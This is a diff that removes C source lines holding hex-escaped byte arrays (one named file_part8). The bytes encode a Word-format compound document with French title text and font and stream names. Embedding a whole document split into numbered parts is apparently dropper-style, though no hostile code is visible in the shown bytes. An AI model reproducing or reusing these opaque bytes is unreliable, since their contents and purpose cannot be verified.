-"\x00\x00\xaa\x67\x00\x00\xb1\x67\x00\x00\xbe\x67\x00\x00\xcd\x67"
-"\x00\x00\xd8\x67\x00\x00\xdc\x67\x00\x00\xdd\x67\x00\x00\xe0\x67"
-"\x00\x00\xe5\x67\x00\x00\xf1\x67\x00\x00\x00\x68\x00\x00\x0d\x68"
-"\x00\x00\x11\x68\x00\x00\x12\x68\x00\x00\x15\x68\x00\x00\x1a\x68"
-"\x00\x00\x25\x68\x00\x00\x34\x68\x00\x00\x3e\x68\x00\x00\x48\x68"
-"\x00\x00\x49\x68\x00\x00\x4c\x68\x00\x00\x54\x68\x00\x00\x5f\x68"
-"\x00\x00\x6e\x68\x00\x00\x81\x68\x00\x00\x85\x68\x00\x00\x86\x68"
-"\x00\x00\x89\x68\x00\x00\x8e\x68\x00\x00\xa2\x68\x00\x00\xb1\x68"
-"\x00\x00\xc3\x68\x00\x00\xd1\x68\x00\x00\xd2\x68\x00\x00\xd5\x68"
-"\x00\x00\xd9\x68\x00\x00\xe6\x68\x00\x00\xf5\x68\x00\x00\xfd\x68"
-"\x00\x00\x01\x69\x00\x00\x02\x69\x00\x00\x05\x69\x00\x00\x0a\x69"
-"\x00\x00\x13\x69\x00\x00\x22\x69\x00\x00\x2c\x69\x00\x00\x30\x69"
-"\x00\x00\x31\x69\x00\x00\x34\x69\x00\x00\x39\x69\x00\x00\x46\x69"
-"\x00\x00\x55\x69\x00\x00\x5b\x69\x00\x00\x5f\x69\x00\x00\x60\x69"
-"\x00\x00\x63\x69\x00\x00\x68\x69\x00\x00\x75\x69\x00\x00\x84\x69"
-"\x00\x00\x8c\x69\x00\x00\x9a\x69\x00\x00\x9b\x69\x00\x00\x9e\x69"
-"\x00\x00\xa3\x69\x00\x00\xb0\x69\x00\x00\xbf\x69\x00\x00\xc6\x69"
-"\x00\x00\xce\x69\x00\x00\xcf\x69\x00\x00\xd2\x69\x00\x00\xd7\x69"
-"\x00\x00\xe4\x69\x00\x00\xf3\x69\x00\x00\xfb\x69\x00\x00\xff\x69"
-"\x00\x00\x00\x6a\x00\x00\x03\x6a\x00\x00\x07\x6a\x00\x00\x13\x6a"
-"\x00\x00\x22\x6a\x00\x00\x33\x6a\x00\x00\x3b\x6a\x00\x00\x3c\x6a"
-"\x00\x00\x3f\x6a\x00\x00\x44\x6a\x00\x00\x4e\x6a\x00\x00\x5d\x6a"
-"\x00\x00\x67\x6a\x00\x00\x6b\x6a\x00\x00\x6c\x6a\x00\x00\x6f\x6a"
-"\x00\x00\x75\x6a\x00\x00\x80\x6a\x00\x00\x8f\x6a\x00\x00\x96\x6a"
-"\x00\x00\x9e\x6a\x00\x00\x9f\x6a\x00\x00\xa2\x6a\x00\x00\xa8\x6a"
-"\x00\x00\xb6\x6a\x00\x00\xc5\x6a\x00\x00\xd4\x6a\x00\x00\xe1\x6a"
-"\x00\x00\xe2\x6a\x00\x00\xe5\x6a\x00\x00\xea\x6a\x00\x00\xf4\x6a"
-"\x00\x00\x03\x6b\x00\x00\x14\x6b\x00\x00\x1c\x6b\x00\x00\x1d\x6b"
-"\x00\x00\x20\x6b\x00\x00\x25\x6b\x00\x00\x31\x6b\x00\x00\x40\x6b"
-"\x00\x00\x48\x6b\x00\x00\x4c\x6b\x00\x00\x4d\x6b\x00\x00\x50\x6b"
-"\x00\x00\x55\x6b\x00\x00\x61\x6b\x00\x00\x70\x6b\x00\x00\x78\x6b"
-"\x00\x00\x7c\x6b\x00\x00\x7d\x6b\x00\x00\x80\x6b\x00\x00\x85\x6b"
-"\x00\x00\x90\x6b\x00\x00\x9f\x6b\x00\x00\xa5\x6b\x00\x00\xa9\x6b"
-"\x00\x00\xaa\x6b\x00\x00\xad\x6b\x00\x00\xb2\x6b\x00\x00\xbe\x6b"
-"\x00\x00\xcd\x6b\x00\x00\xe1\x6b\x00\x00\xe5\x6b\x00\x00\xe6\x6b"
-"\x00\x00\xe9\x6b\x00\x00\xee\x6b\x00\x00\xf8\x6b\x00\x00\x07\x6c"
-"\x00\x00\x11\x6c\x00\x00\x15\x6c\x00\x00\x16\x6c\x00\x00\x19\x6c"
-"\x00\x00\x20\x6c\x00\x00\x31\x6c\x00\x00\x40\x6c\x00\x00\x47\x6c"
-"\x00\x00\x4b\x6c\x00\x00\x4c\x6c\x00\x00\x4f\x6c\x00\x00\x54\x6c"
-"\x00\x00\x66\x6c\x00\x00\x67\x6c\x00\x00\x6e\x6c\x00\x00\x7e\x6c"
-"\x00\x00\x7f\x6c\x00\x00\x82\x6c\x00\x00\x87\x6c\x00\x00\x92\x6c"
-"\x00\x00\xa1\x6c\x00\x00\xa5\x6c\x00\x00\xb3\x6c\x00\x00\xb4\x6c"
-"\x00\x00\xb7\x6c\x00\x00\xbb\x6c\x00\x00\xc7\x6c\x00\x00\xd6\x6c"
-"\x00\x00\xe7\x6c\x00\x00\xef\x6c\x00\x00\xf0\x6c\x00\x00\xf3\x6c"
-"\x00\x00\xf8\x6c\x00\x00\x01\x6d\x00\x00\x10\x6d\x00\x00\x1c\x6d"
-"\x00\x00\x20\x6d\x00\x00\x21\x6d\x00\x00\x24\x6d\x00\x00\x28\x6d"
-"\x00\x00\x33\x6d\x00\x00\x42\x6d\x00\x00\x54\x6d\x00\x00\x58\x6d"
-;
-char file_part8[]=
-"\x00\x00\x59\x6d\x00\x00\x5c\x6d\x00\x00\x62\x6d\x00\x00\x6b\x6d"
-"\x00\x00\x7a\x6d\x00\x00\x82\x6d\x00\x00\x8a\x6d\x00\x00\x8b\x6d"
-"\x00\x00\x8e\x6d\x00\x00\x93\x6d\x00\x00\x9d\x6d\x00\x00\xac\x6d"
-"\x00\x00\xbb\x6d\x2c\x00\xbf\x6d\x00\x00\xc0\x6d\x00\x00\xc3\x6d"
-"\x00\x00\xc7\x6d\x00\x00\xd9\x6d\x00\x00\xe8\x6d\x00\x00\xee\x6d"
-"\x00\x00\xfe\x6d\x00\x00\xff\x6d\x00\x00\x02\x6e\x00\x00\x07\x6e"
-"\x00\x00\x19\x6e\x00\x00\x28\x6e\x00\x00\x32\x6e\x00\x00\x36\x6e"
-"\x00\x00\x37\x6e\x00\x00\x3a\x6e\x00\x00\x3f\x6e\x00\x00\x48\x6e"
-"\x00\x00\x57\x6e\x00\x00\x60\x6e\x00\x00\x64\x6e\x00\x00\x65\x6e"
-"\x00\x00\x68\x6e\x00\x00\x6d\x6e\x00\x00\x79\x6e\x00\x00\x88\x6e"
-"\x00\x00\x90\x6e\x00\x00\x94\x6e\x00\x00\x95\x6e\x00\x00\x98\x6e"
-"\x00\x00\x9e\x6e\x00\x00\xa9\x6e\x00\x00\xb8\x6e\x00\x00\xc4\x6e"
-"\x00\x00\xc9\x6e\x00\x00\xca\x6e\x00\x00\xcd\x6e\x00\x00\xd2\x6e"
-"\x00\x00\xdd\x6e\x00\x00\xec\x6e\x00\x00\xf5\x6e\x00\x00\x03\x6f"
-"\x00\x00\x04\x6f\x00\x00\x07\x6f\x00\x00\x0b\x6f\x00\x00\x15\x6f"
-"\x00\x00\x24\x6f\x00\x00\x2e\x6f\x00\x00\x3c\x6f\x00\x00\x3d\x6f"
-"\x00\x00\xbb\x6f\x00\x00\xb1\x73\x00\x00\x1b\x74\x00\x00\x00\x00"
-"\x00\x00\x35\x00\x00\x00\x01\x00\x00\x00\x35\x00\x00\x00\x21\x86"
-"\x02\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
-"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
-"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
-"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
-"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
-"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
-"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
-"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x6e\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
-"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x96\x01"
-"\x00\x04\x21\x86\x02\x30\x00\x00\x00\x00\xff\x40\x01\x80\x01\x00"
-"\x7d\x71\x00\x00\x7d\x71\x00\x00\x18\x30\x22\x02\x01\x00\x01\x00"
-"\x7d\x71\x00\x00\x00\x00\x00\x00\x7d\x71\x00\x00\x00\x00\x00\x00"
-"\x02\x10\x00\x00\x00\x00\x00\x00\x00\x1a\x74\x00\x00\x70\x00\x00"
-"\x10\x00\x40\x00\x00\xff\xff\x01\x00\x00\x00\x07\x00\x55\x00\x6e"
-"\x00\x6b\x00\x6e\x00\x6f\x00\x77\x00\x6e\x00\xff\xff\x01\x00\x08"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x01\x00\x00"
-"\x00\x00\x00\xff\xff\x00\x00\x02\x00\xff\xff\x00\x00\x00\x00\xff"
-"\xff\x00\x00\x02\x00\xff\xff\x00\x00\x00\x00\x04\x00\x00\x00\x47"
-"\x16\x90\x01\x00\x00\x02\x02\x06\x03\x05\x04\x05\x02\x03\x04\x87"
-"\x7a\x00\x20\x00\x00\x00\x80\x08\x00\x00\x00\x00\x00\x00\x00\xff"
-"\x01\x00\x00\x00\x00\x00\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x73"
-"\x00\x20\x00\x4e\x00\x65\x00\x77\x00\x20\x00\x52\x00\x6f\x00\x6d"
-"\x00\x61\x00\x6e\x00\x00\x00\x35\x16\x90\x01\x02\x00\x05\x05\x01"
-"\x02\x01\x07\x06\x02\x05\x07\x00\x00\x00\x00\x00\x00\x00\x10\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x53"
-"\x00\x79\x00\x6d\x00\x62\x00\x6f\x00\x6c\x00\x00\x00\x33\x26\x90"
-"\x01\x00\x00\x02\x0b\x06\x04\x02\x02\x02\x02\x02\x04\x87\x7a\x00"
-"\x20\x00\x00\x00\x80\x08\x00\x00\x00\x00\x00\x00\x00\xff\x01\x00"
-"\x00\x00\x00\x00\x00\x41\x00\x72\x00\x69\x00\x61\x00\x6c\x00\x00"
-"\x00\x3b\x06\x90\x01\x86\x07\x02\x01\x06\x00\x03\x01\x01\x01\x01"
-"\x01\x03\x00\x00\x00\x00\x00\x0e\x08\x10\x00\x00\x00\x00\x00\x00"
-"\x00\x01\x00\x04\x00\x00\x00\x00\x00\x53\x00\x69\x00\x6d\x00\x53"
-"\x00\x75\x00\x6e\x00\x00\x00\x8b\x5b\x53\x4f\x00\x00\x22\x00\x04"
-"\x00\x71\x08\x88\x18\x00\xf0\xc5\x02\x00\x00\xa9\x01\x00\x00\x00"
-"\x00\x33\x8d\xa1\x46\x21\x95\xa1\x66\x71\x1d\x82\x46\x04\x00\x02"
-"\x00\x00\x00\xd3\x11\x00\x00\x0c\x62\x00\x00\x01\x00\x3b\x00\x00"
-"\x00\x04\x00\x83\x10\xd1\x00\x00\x00\xd3\x11\x00\x00\x0c\x62\x00"
-"\x00\x01\x00\x3b\x00\x00\x00\xd1\x00\x00\x00\x00\x00\x00\x00\x21"
-"\x03\x00\xf0\x10\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa5\x06\xc0"
-"\x07\xb4\x00\xb4\x00\x80\x00\x32\x34\x00\x00\x10\x00\x19\x00\x64"
-"\x00\x00\x00\x19\x00\x00\x00\xa4\x73\x00\x00\xa4\x73\x00\x00\x00"
-"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x01\x33\x83\x51\x00\xf0\x10\x04\xdf\xdf\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48\x00\x00\x00\x00"
-"\x00\x28\xf0\xff\x0f\x01\x00\x01\x3f\x00\x00\xe4\x04\x00\x00\xff"
-"\xff\xff\x7f\xff\xff\xff\x7f\xff\xff\xff\x7f\xff\xff\xff\x7f\xff"
-"\xff\xff\x7f\xff\xff\xff\x7f\xff\xff\xff\x7f\xae\x0f\x6a\x00\xff"
-"\xff\x12\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x4c\x00\x45\x00\x20"
-"\x00\x4c\x00\x49\x00\x56\x00\x52\x00\x45\x00\x54\x00\x20\x00\x44"
-"\x00\x55\x00\x20\x00\x50\x00\x52\x00\x4f\x00\x50\x00\x52\x00\x49"
-"\x00\x45\x00\x54\x00\x41\x00\x49\x00\x52\x00\x45\x00\x20\x00\x44"
-"\x00\x45\x00\x00\x00\x00\x00\x00\x00\x03\x00\x2a\x00\x2a\x00\x2a"
-"\x00\x03\x00\x50\x00\x61\x00\x74\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00"
-"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x16\x00\x05\x01\xff\xff\xff\xff\xff\xff\xff\xff\x03\x00\x00\x00"
-"\x06\x09\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x9f\xde\x2d"
-"\x61\x5a\xc6\x01\xe1\x00\x00\x00\x80\x05\x00\x00\x00\x00\x00\x00"
-"\x44\x00\x61\x00\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x0a\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x82\x00\x00\x00\x2c\x22\x00\x00\x00\x00\x00\x00"
-"\x31\x00\x54\x00\x61\x00\x62\x00\x6c\x00\x65\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x0e\x00\x02\x01\x01\x00\x00\x00\x06\x00\x00\x00\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x94\x00\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00"
-"\x57\x00\x6f\x00\x72\x00\x64\x00\x44\x00\x6f\x00\x63\x00\x75\x00"
-"\x6d\x00\x65\x00\x6e\x00\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x1a\x00\x02\x01\x02\x00\x00\x00\x05\x00\x00\x00\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x29\x02\x01\xb4\x00\x00\x00\x00"
-"\x81\x00\x00\x00\xfe\xff\xff\xff\x83\x00\x00\x00\x84\x00\x00\x00"
-"\x85\x00\x00\x00\x86\x00\x00\x00\x87\x00\x00\x00\x88\x00\x00\x00"
-"\x89\x00\x00\x00\x8a\x00\x00\x00\x8b\x00\x00\x00\x8c\x00\x00\x00"
-"\x8d\x00\x00\x00\x8e\x00\x00\x00\x8f\x00\x00\x00\x90\x00\x00\x00"
-"\x91\x00\x00\x00\x92\x00\x00\x00\x93\x00\x00\x00\xfe\xff\xff\xff"
-"\x95\x00\x00\x00\x96\x00\x00\x00\x97\x00\x00\x00\x98\x00\x00\x00"
-"\x99\x00\x00\x00\x9a\x00\x00\x00\x9b\x00\x00\x00\x9c\x00\x00\x00"
-"\x9d\x00\x00\x00\x9e\x00\x00\x00\x9f\x00\x00\x00\xa0\x00\x00\x00"
-"\xa1\x00\x00\x00\xa2\x00\x00\x00\xa3\x00\x00\x00\xa4\x00\x00\x00"
-"\xa5\x00\x00\x00\xa6\x00\x00\x00\xa7\x00\x00\x00\xa8\x00\x00\x00"
-"\xa9\x00\x00\x00\xaa\x00\x00\x00\xab\x00\x00\x00\xac\x00\x00\x00"
-"\xad\x00\x00\x00\xae\x00\x00\x00\xaf\x00\x00\x00\xb0\x00\x00\x00"
-"\xb1\x00\x00\x00\xb2\x00\x00\x00\xb3\x00\x00\x00\xb4\x00\x00\x00"
-"\xb5\x00\x00\x00\xb6\x00\x00\x00\xb7\x00\x00\x00\xb8\x00\x00\x00"
-"\xb9\x00\x00\x00\xba\x00\x00\x00\xbb\x00\x00\x00\xbc\x00\x00\x00"
-"\xbd\x00\x00\x00\xbe\x00\x00\x00\xbf\x00\x00\x00\xc0\x00\x00\x00"
-"\xc1\x00\x00\x00\xc2\x00\x00\x00\xc3\x00\x00\x00\xc4\x00\x00\x00"
-"\xc5\x00\x00\x00\xc6\x00\x00\x00\xc7\x00\x00\x00\xc8\x00\x00\x00"
-"\xc9\x00\x00\x00\xca\x00\x00\x00\xcb\x00\x00\x00\xfe\xff\xff\xff"
-"\xd0\x00\x00\x00\xfd\xff\xff\xff\xfe\xff\xff\xff\xfe\xff\xff\xff"
-"\xfe\xff\xff\xff\xcf\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xd1\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x01\x00\x00\x00\xfe\xff\xff\xff\x03\x00\x00\x00\x04\x00\x00\x00"
-"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
-"\xfe\xff\xff\xff\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00"
-"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00"
-"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00"
-"\x15\x00\x00\x00\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
